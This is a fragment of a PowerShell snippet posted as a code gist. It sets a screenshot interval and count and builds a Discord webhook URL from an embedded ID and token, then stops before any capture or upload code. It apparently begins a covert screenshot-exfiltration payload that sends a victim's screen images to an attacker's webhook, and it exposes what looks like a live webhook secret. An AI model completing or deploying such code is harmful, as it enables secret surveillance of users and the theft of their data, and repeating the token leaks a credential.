Skip to content

Instantly share code, notes, and snippets.

$seconds = 30 # Interval between screenshots
$a = 1 # Number of screenshots to take
$dc = "1393093891036680202/6EWJI77R-6xHukCw63EK147xeF83XIpUcjStwIkgsWlTeVtcgeinaATb5ulPlmN-xN62"
if ($dc.Length -lt 120) {
$hookurl = "https://discord.com/api/webhooks/$dc"
} else {
$hookurl = $dc
}